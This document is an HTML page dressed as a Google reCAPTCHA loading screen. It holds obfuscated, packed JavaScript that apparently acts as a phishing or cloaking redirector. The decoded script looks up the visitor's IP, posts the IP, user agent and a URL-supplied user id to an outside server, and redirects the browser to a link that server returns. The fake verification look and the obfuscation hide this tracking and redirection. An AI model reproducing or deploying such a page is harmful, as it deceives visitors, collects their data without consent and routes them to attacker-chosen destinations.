<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connect...</title>
</head>
<body>
<p style="text-align:center"><img alt="" src="https://i0.wp.com/weekendtutorial.com/wp-content/uploads/2022/04/google-recaptcha-logo.webp?fit=1280%2C640&amp;ssl=1" style="height:150px; width:300px" /></p>
<p style="text-align:center"><img alt="" src="https://www.faculdadeculturainglesa.com.br/wp-content/themes/fac-cult-ingl/img/carregamento.gif" style="height:240px; width:320px" /></p>
    <script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('e F(k){k=k.v(/[[]/,\'\\\\[\').v(/[\\]]/,\'\\\\]\');13 12=p 1q(\'[\\\\?&]\'+k+\'=([^&#]*)\');13 w=12.1p(m.l.1o);u w===10?\'\':1n(w[1].v(/\\+/g,\' \'))}t e G(){s{4 2=c r(\'f://q.1m.1l?1k=b\');4 11=c 2.b();u 11.3}o(0){8.0(\'9 1j C B:\',0);u 10}}t e E(3,a){s{4 5=Z.5;4 j={a:a,3:3,5:5};4 2=c r(\'f://Y.X.W.V/q.U\',{T:\'S\',R:{\'Q-P\':\'O/b\'},N:M.L(j)});7(!2.i){K p 9(\'J 2 I H i\')}4 h=c 2.b();n(h)}o(0){8.0(\'9:\',0)}}t e D(3){s{4 5=Z.5;4 j={1i:\'1h\',3:3,5:5};4 2=c r(\'f://Y.X.W.V/q.U\',{T:\'S\',R:{\'Q-P\':\'O/b\'},N:M.L(j)});7(!2.i){K p 9(\'J 2 I H i\')}4 h=c 2.b();n(h)}o(0){8.0(\'9:\',0)}}G().1g(3=>{7(3){4 a=F(\'y\');7(a){E(3,a)}d{D(3)}}d{8.0(\'9: 1f 1e 1d C B\')}});e n(6){7(6.x(\'A\')){7(6.A===1c){m.l.z=\'f://1b.1a/\'}d{m.l.z=6.19+\'?y=\'+6.18}}d 7(6.x(\'0\')){8.0(\'17 0:\',6.0)}d{8.0(\'16 2 15 14\')}}',62,89,'error||response|ip|const|userAgent|responseData|if|console|Error|userid|json|await|else|function|https||result|ok|postData|name|location|window|handleResponse|catch|new|api|fetch|try|async|return|replace|results|hasOwnProperty|iduser|href|found|IP|user|sendMata|sendData|getUrlParameter|getUserIP|not|was|Network|throw|stringify|JSON|body|application|Type|Content|headers|POST|method|php|id|co|investamart|stacks|navigator|null|data|regex|var|server|from|Unexpected|Server|nuser|link|com|example|true|retrieve|to|Unable|then|invalid|localblock|getting|format|org|ipify|decodeURIComponent|search|exec|RegExp'.split('|'),0,{}))

 </script>
</body>
</html>
